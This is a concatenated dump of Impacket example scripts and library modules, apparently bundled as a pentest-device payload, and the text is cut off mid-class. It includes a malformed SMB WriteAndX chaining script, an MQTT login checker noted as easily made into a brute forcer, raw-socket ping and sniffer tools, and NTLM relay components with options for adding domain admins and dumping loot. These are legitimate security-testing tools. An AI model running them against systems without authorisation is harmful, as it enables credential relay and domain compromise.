| writeAndX = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 17 | pkt.addCommand(writeAndX) 18 | 19 | writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() 20 | writeAndX['Parameters']['Fid'] = fid 21 | writeAndX['Parameters']['Offset'] = offset 22 | writeAndX['Parameters']['WriteMode'] = 0 23 | writeAndX['Parameters']['Remaining'] = len(data) 24 | writeAndX['Parameters']['DataLength'] = len(data) 25 | writeAndX['Parameters']['DataOffset'] = len(pkt) 26 | writeAndX['Data'] = data+('A'*4000) 27 | 28 | saved_offset = len(pkt) 29 | 30 | writeAndX2 = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 31 | pkt.addCommand(writeAndX2) 32 | 33 | writeAndX2['Parameters'] = 
smb.SMBWriteAndX_Parameters() 34 | writeAndX2['Parameters']['Fid'] = fid 35 | writeAndX2['Parameters']['Offset'] = offset 36 | writeAndX2['Parameters']['WriteMode'] = 0 37 | writeAndX2['Parameters']['Remaining'] = len(data) 38 | writeAndX2['Parameters']['DataLength'] = len(data) 39 | writeAndX2['Parameters']['DataOffset'] = len(pkt) 40 | writeAndX2['Data'] = '\n' 41 | 42 | writeAndX2['Parameters']['AndXCommand'] = self.SMB_COM_WRITE_ANDX 43 | writeAndX2['Parameters']['AndXOffset'] = saved_offset 44 | 45 | self.sendSMB(pkt) 46 | 47 | if wait_answer: 48 | pkt = self.recvSMB() 49 | if pkt.isValidAnswer(self.SMB_COM_WRITE_ANDX): 50 | return pkt 51 | return None 52 | 53 | # Init the example's logger theme 54 | logger.init() 55 | s = lotsSMB('*SMBSERVER','192.168.1.1') 56 | s.login('Administrator','pasword') 57 | tid = s.tree_connect(r'\\*SMBSERVER\IPC$') 58 | fid = s.open_andx(tid, r'\pipe\echo', smb.SMB_O_CREAT, smb.SMB_O_OPEN)[0] 59 | 60 | s.loop_write_andx(tid,fid,'<1234>\n', wait_answer = 0) 61 | 62 | time.sleep(2) 63 | s.close(tid,fid) 64 | 65 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mqtt_check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Author: Alberto Solino (@agsolino) 9 | # 10 | # Description: 11 | # Simple MQTT example aimed at playing with different login options. Can be converted into a account/password 12 | # brute forcer quite easily. 
13 | # 14 | # Reference for: 15 | # MQTT and Structure 16 | # 17 | # 18 | 19 | import argparse 20 | import logging 21 | import re 22 | import sys 23 | 24 | from impacket import version 25 | from impacket.examples import logger 26 | from impacket.mqtt import CONNECT_ACK_ERROR_MSGS, MQTTConnection 27 | 28 | try: 29 | import OpenSSL 30 | from OpenSSL import SSL, crypto 31 | except: 32 | logging.critical("pyOpenSSL is not installed, can't continue") 33 | raise 34 | 35 | 36 | class MQTT_LOGIN: 37 | def __init__(self, username, password, target, options): 38 | self._options = options 39 | self._username = username 40 | self._password = password 41 | self._target = target 42 | 43 | if self._username == '': 44 | self._username = None 45 | 46 | def run(self): 47 | mqtt = MQTTConnection(self._target, int(self._options.port), self._options.ssl) 48 | 49 | if self._options.client_id is None: 50 | clientId = ' ' 51 | else: 52 | clientId = self._options.client_id 53 | 54 | mqtt.connect(clientId, self._username, self._password) 55 | 56 | logging.info(CONNECT_ACK_ERROR_MSGS[0]) 57 | 58 | if __name__ == '__main__': 59 | # Init the example's logger theme 60 | logger.init() 61 | print version.BANNER 62 | parser = argparse.ArgumentParser(add_help=False, 63 | description="MQTT login check") 64 | parser.add_argument("--help", action="help", help='show this help message and exit') 65 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') 66 | parser.add_argument('-client-id', action='store', help='Client ID used when authenticating (default random)') 67 | parser.add_argument('-ssl', action='store_true', help='turn SSL on') 68 | parser.add_argument('-port', action='store', default='1883', help='port to connect to (default 1883)') 69 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 70 | 71 | try: 72 | options = parser.parse_args() 73 | except Exception, e: 74 | logging.error(str(e)) 75 | sys.exit(1) 76 | 77 | if options.debug 
is True: 78 | logging.getLogger().setLevel(logging.DEBUG) 79 | else: 80 | logging.getLogger().setLevel(logging.INFO) 81 | 82 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( 83 | options.target).groups('') 84 | 85 | #In case the password contains '@' 86 | if '@' in address: 87 | password = password + '@' + address.rpartition('@')[0] 88 | address = address.rpartition('@')[2] 89 | 90 | check_mqtt = MQTT_LOGIN(username, password, address, options) 91 | try: 92 | check_mqtt.run() 93 | except Exception, e: 94 | #import traceback 95 | #traceback.print_exc() 96 | logging.error(e) 97 | 98 | 99 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mssqlinstance.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: [MC-SQLR] example. 
Retrieves the instances names from the target host 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | # Reference for: 14 | # Structure 15 | # 16 | 17 | 18 | import argparse 19 | import sys 20 | import string 21 | import logging 22 | 23 | from impacket.examples import logger 24 | from impacket import version, tds 25 | 26 | if __name__ == '__main__': 27 | 28 | print version.BANNER 29 | # Init the example's logger theme 30 | logger.init() 31 | 32 | parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.") 33 | 34 | parser.add_argument('host', action='store', help='target host') 35 | parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') 36 | 37 | if len(sys.argv)==1: 38 | parser.print_help() 39 | sys.exit(1) 40 | 41 | options = parser.parse_args() 42 | 43 | ms_sql = tds.MSSQL(options.host) 44 | instances = ms_sql.getInstances(string.atoi(options.timeout)) 45 | if len(instances) == 0: 46 | "No MSSQL Instances found" 47 | else: 48 | for i, instance in enumerate(instances): 49 | logging.info("Instance %d" % i) 50 | for key in instance.keys(): 51 | print key + ":" + instance[key] 52 | 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/opdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """opdump - scan for operations on a given DCERPC interface 3 | 4 | Usage: opdump.py hostname port interface version 5 | 6 | This binds to the given hostname:port and DCERPC interface. Then, it tries to 7 | call each of the first 256 operation numbers in turn and reports the outcome 8 | of each call. 9 | 10 | This will generate a burst of TCP connections to the given host:port! 
11 | 12 | Example: 13 | $ ./opdump.py 10.0.0.30 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0 14 | op 0 (0x00): rpc_x_bad_stub_data 15 | op 1 (0x01): rpc_x_bad_stub_data 16 | op 2 (0x02): rpc_x_bad_stub_data 17 | op 3 (0x03): success 18 | op 4 (0x04): rpc_x_bad_stub_data 19 | ops 5-255: nca_s_op_rng_error 20 | 21 | rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an 22 | operation at that number. 23 | 24 | Author: Catalin Patulea 25 | """ 26 | import sys 27 | 28 | from impacket.examples import logger 29 | from impacket import uuid 30 | from impacket.dcerpc.v5 import transport 31 | 32 | 33 | def main(args): 34 | if len(args) != 4: 35 | print "usage: opdump.py hostname port interface version" 36 | return 1 37 | 38 | host, port, interface, version = args[0], int(args[1]), args[2], args[3] 39 | 40 | stringbinding = "ncacn_ip_tcp:%s" % host 41 | trans = transport.DCERPCTransportFactory(stringbinding) 42 | trans.set_dport(port) 43 | 44 | results = [] 45 | for i in range(256): 46 | dce = trans.get_dce_rpc() 47 | dce.connect() 48 | 49 | iid = uuid.uuidtup_to_bin((interface, version)) 50 | dce.bind(iid) 51 | 52 | dce.call(i, "") 53 | try: 54 | dce.recv() 55 | except Exception, e: 56 | result = str(e) 57 | else: 58 | result = "success" 59 | 60 | dce.disconnect() 61 | 62 | results.append(result) 63 | 64 | # trim duplicate suffixes from the back 65 | suffix = results[-1] 66 | while results and results[-1] == suffix: 67 | results.pop() 68 | 69 | for i, result in enumerate(results): 70 | print "op %d (0x%02x): %s" % (i, i, result) 71 | 72 | print "ops %d-%d: %s" % (len(results), 255, suffix) 73 | 74 | if __name__ == "__main__": 75 | # Init the example's logger theme 76 | logger.init() 77 | sys.exit(main(sys.argv[1:])) 78 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/ping.py: 
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Simple ICMP ping.
#
# This implementation of ping uses the ICMP echo and echo-reply packets
# to check the status of a host. If the remote host is up, it should reply
# to the echo probe with an echo-reply packet.
# Note that this isn't a definite test, as in the case the remote host is up
# but refuses to reply the probes.
# Also note that the user must have special access to be able to open a raw
# socket, which this program requires.
#
# Authors:
#  Gerardo Richarte
#  Javier Kohen
#
# Reference for:
#  ImpactPacket: IP, ICMP, DATA.
#  ImpactDecoder.

import select
import socket
import time
import sys

from impacket import ImpactDecoder, ImpactPacket

# Two positional arguments: argv[1] is the source address placed in the IP
# header, argv[2] the destination (the argument names were lost from the
# usage string below).
if len(sys.argv) < 3:
    print "Use: %s " % sys.argv[0]
    sys.exit(1)

src = sys.argv[1]
dst = sys.argv[2]

# Create a new IP packet and set its source and destination addresses.
# src is written into the IP header as given (IP_HDRINCL below makes the
# kernel send the header as-is); the reply filter at the bottom only accepts
# packets addressed to src, so it must be an address this host receives.

ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)

# Create a new ICMP packet of type ECHO.

icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)

# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data("A"*156))

# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)

# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

# seq_id is stored in the ICMP *identifier* field (set_icmp_id), not the
# sequence-number field; the match below reads it back with get_icmp_id().
seq_id = 0
# Loops until interrupted; the raw socket is never closed explicitly.
while 1:
    # Give the ICMP packet the next ID in the sequence.
    seq_id += 1
    icmp.set_icmp_id(seq_id)

    # Calculate its checksum.
    # Zero the field first, then let get_packet() fill it in.
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1

    # Send it to the target host.
    s.sendto(ip.get_packet(), (dst, 0))

    # Wait for incoming replies.
    # One-second select() timeout; an unanswered probe is simply not
    # reported (nothing is printed for it).
    if s in select.select([s],[],[],1)[0]:
        reply = s.recvfrom(2000)[0]

        # Use ImpactDecoder to reconstruct the packet hierarchy.
        rip = ImpactDecoder.IPDecoder().decode(reply)
        # Extract the ICMP packet from its container (the IP packet).
        ricmp = rip.child()

        # If the packet matches, report it to the user.
        # Matched on the two addresses and the ICMP type only; the
        # identifier is not compared with seq_id, so any echo reply between
        # these two addresses is printed, whichever probe it answers.
        if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():
            print "Ping reply for sequence #%d" % ricmp.get_icmp_id()

    time.sleep(1)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/examples/ping6.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Simple ICMP6 ping.
#
# This implementation of ping uses the ICMP echo and echo-reply packets
# to check the status of a host. If the remote host is up, it should reply
# to the echo probe with an echo-reply packet.
# Note that this isn't a definite test, as in the case the remote host is up
# but refuses to reply the probes.
# Also note that the user must have special access to be able to open a raw
# socket, which this program requires.
#
# Authors:
#  Alberto Solino (@agsolino)
#
# Reference for:
#  ImpactPacket: ICMP6
#  ImpactDecoder.

import select
import socket
import time
import sys

from impacket import ImpactDecoder, ImpactPacket, IP6, ICMP6, version

print version.BANNER

# Two positional arguments: argv[1] source address, argv[2] destination
# (the argument names were lost from the usage string below).
if len(sys.argv) < 3:
    print "Use: %s " % sys.argv[0]
    sys.exit(1)

src = sys.argv[1]
dst = sys.argv[2]

# Create a new IP packet and set its source and destination addresses.
# Only the ICMP6 bytes are handed to sendto() further down; the IP6 object
# is where the addresses the checksum is computed over come from (the kernel
# builds the actual IPv6 header for an IPPROTO_ICMPV6 raw socket).

ip = IP6.IP6()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
ip.set_traffic_class(0)
ip.set_flow_label(0)
ip.set_hop_limit(64)

# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)

payload = "A"*156

print "PING %s %d data bytes" % (dst, len(payload))
seq_id = 0
# Loops until interrupted; the socket is never closed explicitly.
while 1:
    # Give the ICMP packet the next ID in the sequence.
    # Echo_Request(identifier, sequence number, data): the identifier is the
    # constant 1, seq_id goes into the sequence-number field.
    seq_id += 1
    icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload)

    # Have the IP packet contain the ICMP packet (along with its payload).
    # next_header and payload_length must be set before the checksum is
    # computed, since the pseudo-header covers them.
    ip.contains(icmp)
    ip.set_next_header(ip.child().get_ip_protocol_number())
    ip.set_payload_length(ip.child().get_size())
    icmp.calculate_checksum()

    # Send it to the target host.
    s.sendto(icmp.get_packet(), (dst, 0))

    # Wait for incoming replies.
    # One-second select() timeout; an unanswered probe prints nothing.
    if s in select.select([s],[],[],1)[0]:
        reply = s.recvfrom(2000)[0]

        # Use ImpactDecoder to reconstruct the packet hierarchy.
        rip = ImpactDecoder.ICMP6Decoder().decode(reply)

        # If the packet matches, report it to the user.
        # Only the ICMP6 type is checked: neither the source address nor the
        # identifier/sequence number is compared, so any echo reply the
        # socket receives is reported as if it answered this probe.
        if ICMP6.ICMP6.ECHO_REPLY == rip.get_type():
            # -4: the Echo header (identifier + sequence) is not counted as data.
            print "%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4,dst,rip.get_echo_sequence_number())

    time.sleep(1)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/examples/smbserver.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Simple SMB Server example.
#
# Author:
#  Alberto Solino (@agsolino)
#

import sys
import argparse
import logging

from impacket.examples import logger
from impacket import smbserver, version

if __name__ == '__main__':

    # Init the example's logger theme
    logger.init()
    print version.BANNER

    # Options use a single leading dash ('-comment', '-debug', ...), so the
    # usual '--comment' spelling is not accepted.
    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
                                     "share specified as an argument. You need to be root in order to bind to port 445. "
                                     "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP "
                                     "/tmp")

    parser.add_argument('shareName', action='store', help='name of the share to add')
    parser.add_argument('sharePath', action='store', help='path of the share to add')
    parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    try:
        options = parser.parse_args()
    except Exception, e:
        logging.critical(str(e))
        sys.exit(1)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    if options.comment is None:
        comment = ''
    else:
        comment = options.comment

    server = smbserver.SimpleSMBServer()

    # Share names are exposed upper-cased regardless of how they were typed.
    server.addShare(options.shareName.upper(), options.sharePath, comment)
    server.setSMB2Support(options.smb2support)

    # Here you can set a custom SMB challenge in hex format
    # If empty defaults to '4141414141414141'
    # (remember: must be 16 hex bytes long)
    # e.g. server.setSMBChallenge('12345678abcdef00')
    # NOTE(review): whichever value is used, it is a fixed challenge rather
    # than a fresh per-session nonce, and (per the description above) no
    # authentication is enforced - keep this server on an isolated lab
    # network.
    server.setSMBChallenge('')

    # If you don't want log to stdout, comment the following line
    # If you want log dumped to a file, enter the filename
    server.setLogFile('')

    # Rock and roll
    server.start()

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/examples/sniffer.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Simple packet sniffer.
#
# This packet sniffer uses a raw socket to listen for packets
# in transit corresponding to the specified protocols.
#
# Note that the user might need special permissions to be able to use
# raw sockets.
#
# Authors:
#  Gerardo Richarte
#  Javier Kohen
#
# Reference for:
#  ImpactDecoder.

from select import select
import socket
import sys

from impacket import ImpactDecoder

DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp')

# NOTE(review): in the default case toListen is this tuple, while the
# command-line case yields a list; code below that mutates toListen has to
# allow for both.
if len(sys.argv) == 1:
    toListen = DEFAULT_PROTOCOLS
    print "Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0]
else:
    toListen = sys.argv[1:]

# Open one socket for each specified protocol.
# A special option is set on the socket so that IP headers are included with
# the returned data.
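sockets = []
# Protocol names that resolved to a number are collected into a fresh list
# instead of being removed from toListen while it is being iterated:
# list.remove() inside the loop skips the entry that follows the removed one,
# and the default toListen is a tuple, which has no remove() at all.
available = []
for protocol in toListen:
    try:
        protocol_num = socket.getprotobyname(protocol)
    except socket.error:
        print("Ignoring unknown protocol: %s" % protocol)
        continue
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    sockets.append(s)
    available.append(protocol)
toListen = available

if 0 == len(toListen):
    print("There are no protocols available.")
    sys.exit(0)

print("Listening on protocols: %s" % (toListen,))

# Instantiate an IP packets decoder.
# As all the packets include their IP header, that decoder only is enough.
decoder = ImpactDecoder.IPDecoder()

while len(sockets) > 0:
    # Wait for an incoming packet on any socket.
    ready = select(sockets, [], [])[0]
    # `ready` is a separate list, so removing from `sockets` here is safe.
    for s in ready:
        packet = s.recvfrom(4096)[0]
        if 0 == len(packet):
            # Socket remotely closed. Discard it.
            sockets.remove(s)
            s.close()
        else:
            # Packet received. Decode and display it.
            packet = decoder.decode(packet)
            print(packet)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/examples/uncrc32.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# based on:
#
# Reversing CRC - Theory and Practice.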
5 | # HU Berlin Public Report 6 | # SAR-PR-2006-05 7 | # May 2006 8 | # Authors: 9 | # Martin Stigge, Henryk Plotz, Wolf Muller, Jens-Peter Redlich 10 | 11 | FINALXOR = 0xffffffffL 12 | INITXOR = 0xffffffffL 13 | CRCPOLY = 0xEDB88320L 14 | CRCINV = 0x5B358FD3L 15 | 16 | from binascii import crc32 17 | from struct import pack 18 | 19 | def tableAt(byte): 20 | return crc32(chr(byte ^ 0xff)) & 0xffffffff ^ FINALXOR ^ (INITXOR >> 8) 21 | 22 | def compensate(buf, wanted): 23 | wanted ^= FINALXOR 24 | 25 | newBits = 0 26 | for i in range(32): 27 | if newBits & 1: 28 | newBits >>= 1 29 | newBits ^= CRCPOLY 30 | else: 31 | newBits >>= 1 32 | 33 | if wanted & 1: 34 | newBits ^= CRCINV 35 | 36 | wanted >>= 1 37 | 38 | newBits ^= crc32(buf) ^ FINALXOR 39 | return pack('") 29 | 30 | class EAPR(ProtocolPacket): 31 | """It represents a request or a response in EAP (codes 1 and 2)""" 32 | 33 | IDENTITY = 0x01 34 | EXPANDED = 0xfe 35 | 36 | header_size = 1 37 | tail_size = 0 38 | 39 | type = Byte(0) 40 | 41 | class EAP(ProtocolPacket): 42 | REQUEST = 0x01 43 | RESPONSE = 0x02 44 | SUCCESS = 0x03 45 | FAILURE = 0x04 46 | 47 | header_size = 4 48 | tail_size = 0 49 | 50 | code = Byte(0) 51 | identifier = Byte(1) 52 | length = Word(2, ">") 53 | 54 | class EAPOL(ProtocolPacket): 55 | EAP_PACKET = 0x00 56 | EAPOL_START = 0x01 57 | EAPOL_LOGOFF = 0x02 58 | EAPOL_KEY = 0x03 59 | EAPOL_ENCAPSULATED_ASF_ALERT = 0x04 60 | 61 | DOT1X_VERSION = 0x01 62 | 63 | header_size = 4 64 | tail_size = 0 65 | 66 | version = Byte(0) 67 | packet_type = Byte(1) 68 | body_length = Word(2, ">") 69 | 70 | 71 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- 
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/logger.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: This logger is intended to be used by impacket instead
# of printing directly. This will allow other libraries to use their
# custom logging implementation.
#

import logging
import sys

# This module can be used by scripts using the Impacket library
# in order to configure the root logger to output events
# generated by the library with a predefined format

# If the scripts want to generate log entries, they can write
# directly to the root logger (logging.info, debug, etc).

class ImpacketFormatter(logging.Formatter):
    '''
    Formatter that prefixes every record with a bullet chosen by level,
    exposed to the format string as the custom record attribute 'bullet'.
    '''
    # Level -> bullet. Levels not listed here (ERROR, CRITICAL, custom
    # levels) fall back to '[-]' in format().
    BULLETS = {
        logging.INFO: '[*]',
        logging.DEBUG: '[+]',
        logging.WARNING: '[!]',
    }

    def __init__(self):
        logging.Formatter.__init__(self, '%(bullet)s %(message)s', None)

    def format(self, record):
        # Stamp the bullet onto the record so '%(bullet)s' resolves, then let
        # the base class do the real formatting.
        record.bullet = self.BULLETS.get(record.levelno, '[-]')
        return logging.Formatter.format(self, record)

def init():
    '''
    Install a stdout StreamHandler using ImpacketFormatter on the root
    logger and set the root level to INFO.
    '''
    root_logger = logging.getLogger()
    stdout_handler = logging.StreamHandler(sys.stdout)
    stdout_handler.setFormatter(ImpacketFormatter())
    root_logger.addHandler(stdout_handler)
    root_logger.setLevel(logging.INFO)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/__init__.py:
# --------------------------------------------------------------------------------
from mssqlrelayclient import MSSQLRelayClient
from smbrelayclient import SMBRelayClient
from ldaprelayclient import LDAPRelayClient
from httprelayclient import HTTPRelayClient
from imaprelayclient import IMAPRelayClient
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License.
# See the accompanying LICENSE file
# for more information.
#
# Author:
#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
#  IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange
#
import logging
import imaplib
import base64

class IMAPRelayClient:
    """IMAP side of the relay: opens the session in __init__, then
    sendNegotiate()/sendAuth() forward the two NTLM message blobs the relay
    server hands it, as base64 over an AUTHENTICATE NTLM exchange.

    Relies on imaplib internals (_new_tag, _get_tagged_response, .state),
    so it is tied to the imaplib version it was written against.
    """
    def __init__(self, target):
        # Target comes as protocol://target:port
        # Exactly two ':' are expected (scheme, host, port); a target with
        # more or fewer raises ValueError on the unpacking below.
        self.target = target
        proto, host, port = target.split(':')
        host = host[2:]
        if int(port) == 993 or proto.upper() == 'IMAPS':
            self.session = imaplib.IMAP4_SSL(host,int(port))
        else:
            #assume non-ssl IMAP
            # NOTE(review): port is passed as a string here but as int()
            # in the SSL branch; imaplib tolerates both, but int() would be
            # consistent.
            self.session = imaplib.IMAP4(host,port)
        if 'AUTH=NTLM' not in self.session.capabilities:
            logging.error('IMAP server does not support NTLM authentication!')
            # NOTE(review): returning a value other than None from __init__
            # makes the constructor raise TypeError, so a caller never sees
            # False here - it gets an exception (and an object whose
            # authtag/lastresult were never set). Raising an explicit
            # exception would express the intent.
            return False
        self.authtag = self.session._new_tag()
        self.lastresult = None

    def sendNegotiate(self,negotiateMessage):
        #Negotiate auth
        # Returns the raw server challenge bytes, False if the server did
        # not send a continuation, or None (implicitly) if decoding the
        # challenge line failed.
        negotiate = base64.b64encode(negotiateMessage)
        self.session.send('%s AUTHENTICATE NTLM%s' % (self.authtag,imaplib.CRLF))
        resp = self.session.readline().strip()
        if resp != '+':
            logging.error('IMAP Client error, expected continuation (+), got %s ' % resp)
            return False
        else:
            self.session.send(negotiate + imaplib.CRLF)
            try:
                serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char
                serverChallenge = base64.b64decode(serverChallengeBase64)
                return serverChallenge
            except (IndexError, KeyError, AttributeError):
                # NOTE(review): malformed base64 from the server is not in
                # this tuple (b64decode raises TypeError on Python 2), so
                # that case propagates instead of being logged here.
                logging.error('No NTLM challenge returned from IMAP server')

    def sendAuth(self,authenticateMessageBlob, serverChallenge=None):
        #Send auth
        # serverChallenge is accepted for interface parity with the other
        # relay clients but is not used by IMAP.
        auth = base64.b64encode(authenticateMessageBlob)
        self.session.send(auth + imaplib.CRLF)
        typ, data = self.session._get_tagged_response(self.authtag)
        if typ == 'OK':
            # Tell imaplib the session is authenticated so its later
            # commands (select, fetch, ...) are allowed.
            self.session.state = 'AUTH'
            return True
        else:
            logging.info('Auth failed - IMAP server said: %s' % ' '.join(data))
            return False

    #SMB Relay server needs this
    @staticmethod
    def get_encryption_key():
        # IMAP has no session key to hand back; always None.
        return None
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/servers/__init__.py:
# --------------------------------------------------------------------------------
from httprelayserver import HTTPRelayServer
from smbrelayserver import SMBRelayServer
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/config.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
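#
# Config utilities
#
# Author:
#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
#  Configuration class which holds the config specified on the
#  command line, this can be passed to the tools' servers and clients
class NTLMRelayxConfig:
    """Plain value object holding the command-line configuration.

    Every attribute gets a default in __init__, so servers and clients can
    read any option without first checking whether its set*() method was
    called.
    """
    def __init__(self):
        self.daemon = True
        self.domainIp = None
        self.machineAccount = None
        self.machineHashes = None
        self.target = None
        self.mode = None
        self.redirecthost = None
        self.outputFile = None
        self.attacks = None
        self.lootdir = None
        self.randomtargets = False
        self.encoding = None

        #SMB options
        self.exeFile = None
        self.command = None
        self.interactive = False

        #LDAP options
        self.dumpdomain = True
        self.addda = True

        #MSSQL options
        self.queries = []

        #IMAP options
        # Previously created only by setIMAPOptions(), so reading them on a
        # config that never had it called raised AttributeError.
        self.keyword = None
        self.mailbox = None
        self.dump_all = None
        self.dump_max = None

    def setOutputFile(self, outputFile):
        self.outputFile = outputFile

    def setTargets(self, target):
        self.target = target

    def setExeFile(self, filename):
        self.exeFile = filename

    def setCommand(self, command):
        self.command = command

    def setEncoding(self, encoding):
        self.encoding = encoding

    def setMode(self, mode):
        self.mode = mode

    def setAttacks(self, attacks):
        self.attacks = attacks

    def setLootdir(self, lootdir):
        self.lootdir = lootdir

    def setRedirectHost(self, redirecthost):
        self.redirecthost = redirecthost

    def setDomainAccount(self, machineAccount, machineHashes, domainIp):
        self.machineAccount = machineAccount
        self.machineHashes = machineHashes
        self.domainIp = domainIp

    def setRandomTargets(self, randomtargets):
        self.randomtargets = randomtargets

    def setLDAPOptions(self, dumpdomain, addda):
        self.dumpdomain = dumpdomain
        self.addda = addda

    def setMSSQLOptions(self, queries):
        self.queries = queries

    def setInteractive(self, interactive):
        self.interactive = interactive

    def setIMAPOptions(self, keyword, mailbox, dump_all, dump_max):
        self.keyword = keyword
        self.mailbox = mailbox
        self.dump_all = dump_all
        self.dump_max = dump_max

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# TCP interactive shell
#
# Author:
#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
#  Launches a TCP shell for interactive use of clients
#  after successful relaying
import socket
#Default listen port
port = 11000
class TcpShell:
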